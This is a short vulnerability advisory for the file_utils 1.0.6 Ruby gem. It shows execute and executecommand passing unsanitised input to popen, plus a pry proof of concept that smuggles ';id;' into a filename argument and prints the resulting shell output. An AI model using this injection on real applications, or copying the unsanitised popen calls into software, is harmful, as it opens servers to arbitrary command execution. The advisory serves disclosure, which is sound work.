TITLE: Remote Command Injection in file_utils 1.0.6 ruby gem

DOWNLOAD: http://rubygems.org/gems/file_utils

CVE: N/A

DESCRIPTION: If the execute method is used in a rails app to take input from a remote user commands can be injected into shell. User input is not sanitized before being passed to popen().

CODE:

55   def execute command
 56     IO.popen(command).eachline do |line|
 57       puts line
 58     end
 59   end
 60 
 61   def executecommand(command)
 62     output = nil
 63     error = nil
 64     status = nil
 65 
 66     Open3.popen3(command) do |_, stdout, stderr|
 67       output = stdout.readlines
 68       error = stderr.readlines
 69       status = $?
 70     end

PoC:

larry@sp0rk:~$ pry -r 'fileutils/fileutils'
[1] pry(main)> include FileUtils
=> Object
[2] pry(main)> def processfile filename
[2] pry(main)*   execute ("pdf2ps #{filename} outfile.ps")
[2] pry(main)* end 

=> nil
[3] pry(main)> filename = "secret.rb;id;"  <-- user supplied input
=> "secret.rb;id;"
[4] pry(main)> processfile (filename)
Error: /undefined in password <-- secret.rb was just a file laying around from an other PoC
Operand stack:

Execution stack:
   %interpexit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stoppedpush   --nostringval--   --nostringval--   --nostringval--   false   1   %stoppedpush   1910   1   3   %oparraypop   1909   1   3   %oparraypop   1893   1   3   %oparraypop   1787   1   3   %oparraypop   --nostringval--   %errorexecpop   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--
Dictionary stack:
   --dict:1167/1684(ro)(G)--   --dict:0/20(G)--   --dict:77/200(L)--
Current allocation mode is local
Current file position is 9
GPL Ghostscript 9.06: Unrecoverable error, exit code 1
uid=1000(larry) gid=1000(larry) groups=1000(larry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),106(lpadmin),117(sambashare)
sh: 1: outfile.ps: not found
=> #
[5] pry(main)> 

AUTHOR: Larry W. Cashdollar (@_larry0)